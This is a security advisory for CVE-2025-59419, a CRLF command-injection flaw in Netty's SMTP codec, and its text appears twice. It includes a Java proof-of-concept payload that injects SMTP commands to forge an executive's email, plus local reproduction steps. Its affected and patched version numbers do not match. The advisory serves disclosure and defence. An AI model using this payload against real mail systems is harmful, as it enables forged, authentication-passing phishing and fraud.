CVE-2025-59419

Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.128.Final and 4.2.7.Final, the SMTP codec in Netty contains an SMTP command injection vulnerability due to insufficient input validation for Carriage Return (\r) and Line Feed (\n) characters in user-supplied parameters. The vulnerability exists in io.netty.handler.codec.smtp.DefaultSmtpRequest, where parameters are directly concatenated into the SMTP command string without sanitization. When methods such as SmtpRequests.rcpt(recipient) are called with a malicious string containing CRLF sequences, attackers can inject arbitrary SMTP commands. Because the injected commands are sent from the server's trusted IP address, resulting emails will likely pass SPF and DKIM authentication checks, making them appear legitimate. This allows remote attackers who can control SMTP command parameters (such as email recipients) to forge arbitrary emails from the trusted server, potentially impersonating executives and forging high-stakes corporate communications. This issue has been patched in versions 4.1.129.Final and 4.2.8.Final. No known workarounds exist.

Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.128.Final and 4.2.7.Final, the SMTP codec in Netty contains an SMTP command injection vulnerability due to insufficient input validation for Carriage Return (\r) and Line Feed (\n) characters in user-supplied parameters. The vulnerability exists in io.netty.handler.codec.smtp.DefaultSmtpRequest, where parameters are directly concatenated into the SMTP command string without sanitization. When methods such as SmtpRequests.rcpt(recipient) are called with a malicious string containing CRLF sequences, attackers can inject arbitrary SMTP commands. Because the injected commands are sent from the server's trusted IP address, resulting emails will likely pass SPF and DKIM authentication checks, making them appear legitimate. This allows remote attackers who can control SMTP command parameters (such as email recipients) to forge arbitrary emails from the trusted server, potentially impersonating executives and forging high-stakes corporate communications. This issue has been patched in versions 4.1.129.Final and 4.2.8.Final. No known workarounds exist.

### Summary An SMTP Command Injection (CRLF Injection) vulnerability in Netty's SMTP codec allows a remote attacker who can control SMTP command parameters (e.g., an email recipient) to forge arbitrary emails from the trusted server. This bypasses standard email authentication and can be used to impersonate executives and forge high-stakes corporate communications. ### Details The root cause is the lack of input validation for Carriage Return (\r) and Line Feed (\n) characters in user-supplied parameters. The vulnerable code is in io.netty.handler.codec.smtp.DefaultSmtpRequest, where parameters are directly concatenated into the SMTP command string. For example, when SmtpRequests.rcpt(recipient) is called, a malicious recipient string containing CRLF sequences can inject a new, separate SMTP command. Because the injected commands are sent from the server's trusted IP, any resulting emails will likely pass SPF and DKIM checks, making them appear legitimate to the victim's email client. ### PoC A minimal PoC involves passing a crafted string containing CRLF sequences to any `SmtpRequest` that accepts user-controlled parameters. **1. Malicious Payload** The core of the exploit is the payload, where new SMTP commands are injected into a parameter. ```java // The legitimate recipient is followed by an injected email sequence String injected_recipient = "legit-recipient@example.com\r\n" + "MAIL FROM:<ceo@trusted-domain.com>\r\n" + "RCPT TO:<victim@anywhere.com>\r\n" + "DATA\r\n" + "From: ceo@trusted-domain.com\r\n" + "To: victim@anywhere.com\r\n" + "Subject: Urgent: Phishing Email\r\n" + "\r\n" + "This is a forged email that will pass authentication checks.\r\n" + ".\r\n" + "QUIT\r\n"; ``` **2. Triggering the Vulnerability** The vulnerability is triggered when this payload is used to create an SMTP request. ```java // The Netty SMTP codec will fail to sanitize this input SmtpRequest maliciousRequest = SmtpRequests.rcpt(injected_recipient); // When this request is sent to an SMTP server, the injected commands // will be executed, sending a forged email. channel.writeAndFlush(maliciousRequest); ``` **3. Full Reproduction Steps** A complete, runnable PoC is available as a GitHub Gist to demonstrate the full attack flow against a local SMTP server * **Full PoC Code:** https://gist.github.com/DepthFirstDisclosures/ddacca28cb94b48fa8ab998cef59ed8c To run the full PoC: 1. **Set up a local SMTP server.** The easiest way is using MailHog: * On macOS: `brew install mailhog && mailhog` * Using Docker: `docker run -p 1025:1025 -p 8025:8025 mailhog/mailhog` 2. **Run the PoC code.** The code will connect to the SMTP server at `localhost:1025` and send the malicious payload. 3. **Verify the result.** Open the MailHog web UI at `http://localhost:8025`. You will see the forged email sent to `victim@anywhere.com` from `ceo@trusted-domain.com`. ### Impact This is a SMTP Command Injection vulnerability. It impacts any application using `netty-codec-smtp` to construct SMTP requests where an attacker can control or influence any of the SMTP string parameters (e.g., `from`, `recipient`, `helo` hostname). The primary impacts are: * **Economic Manipulation & Disinformation:** Attackers can forge emails from high-value targets (e.g., corporate executives, government officials) and send them to journalists, financial institutions, or the public. A fraudulent email announcing false financial results, a fake merger, or a security breach could be used to manipulate stock prices or cause significant economic disruption. * **Sophisticated Phishing:** Attackers can send high-fidelity phishing emails that bypass email authentication (SPF/DKIM) and appear to come from a trusted source, making them highly likely to deceive users.

### Summary An SMTP Command Injection (CRLF Injection) vulnerability in Netty's SMTP codec allows a remote attacker who can control SMTP command parameters (e.g., an email recipient) to forge arbitrary emails from the trusted server. This bypasses standard email authentication and can be used to impersonate executives and forge high-stakes corporate communications. ### Details The root cause is the lack of input validation for Carriage Return (\r) and Line Feed (\n) characters in user-supplied parameters. The vulnerable code is in io.netty.handler.codec.smtp.DefaultSmtpRequest, where parameters are directly concatenated into the SMTP command string. For example, when SmtpRequests.rcpt(recipient) is called, a malicious recipient string containing CRLF sequences can inject a new, separate SMTP command. Because the injected commands are sent from the server's trusted IP, any resulting emails will likely pass SPF and DKIM checks, making them appear legitimate to the victim's email client. ### PoC A minimal PoC involves passing a crafted string containing CRLF sequences to any `SmtpRequest` that accepts user-controlled parameters. **1. Malicious Payload** The core of the exploit is the payload, where new SMTP commands are injected into a parameter. ```java // The legitimate recipient is followed by an injected email sequence String injected_recipient = "legit-recipient@example.com\r\n" + "MAIL FROM:<ceo@trusted-domain.com>\r\n" + "RCPT TO:<victim@anywhere.com>\r\n" + "DATA\r\n" + "From: ceo@trusted-domain.com\r\n" + "To: victim@anywhere.com\r\n" + "Subject: Urgent: Phishing Email\r\n" + "\r\n" + "This is a forged email that will pass authentication checks.\r\n" + ".\r\n" + "QUIT\r\n"; ``` **2. Triggering the Vulnerability** The vulnerability is triggered when this payload is used to create an SMTP request. ```java // The Netty SMTP codec will fail to sanitize this input SmtpRequest maliciousRequest = SmtpRequests.rcpt(injected_recipient); // When this request is sent to an SMTP server, the injected commands // will be executed, sending a forged email. channel.writeAndFlush(maliciousRequest); ``` **3. Full Reproduction Steps** A complete, runnable PoC is available as a GitHub Gist to demonstrate the full attack flow against a local SMTP server * **Full PoC Code:** https://gist.github.com/DepthFirstDisclosures/ddacca28cb94b48fa8ab998cef59ed8c To run the full PoC: 1. **Set up a local SMTP server.** The easiest way is using MailHog: * On macOS: `brew install mailhog && mailhog` * Using Docker: `docker run -p 1025:1025 -p 8025:8025 mailhog/mailhog` 2. **Run the PoC code.** The code will connect to the SMTP server at `localhost:1025` and send the malicious payload. 3. **Verify the result.** Open the MailHog web UI at `http://localhost:8025`. You will see the forged email sent to `victim@anywhere.com` from `ceo@trusted-domain.com`. ### Impact This is a SMTP Command Injection vulnerability. It impacts any application using `netty-codec-smtp` to construct SMTP requests where an attacker can control or influence any of the SMTP string parameters (e.g., `from`, `recipient`, `helo` hostname). The primary impacts are: * **Economic Manipulation & Disinformation:** Attackers can forge emails from high-value targets (e.g., corporate executives, government officials) and send them to journalists, financial institutions, or the public. A fraudulent email announcing false financial results, a fake merger, or a security breach could be used to manipulate stock prices or cause significant economic disruption. * **Sophisticated Phishing:** Attackers can send high-fidelity phishing emails that bypass email authentication (SPF/DKIM) and appear to come from a trusted source, making them highly likely to deceive users.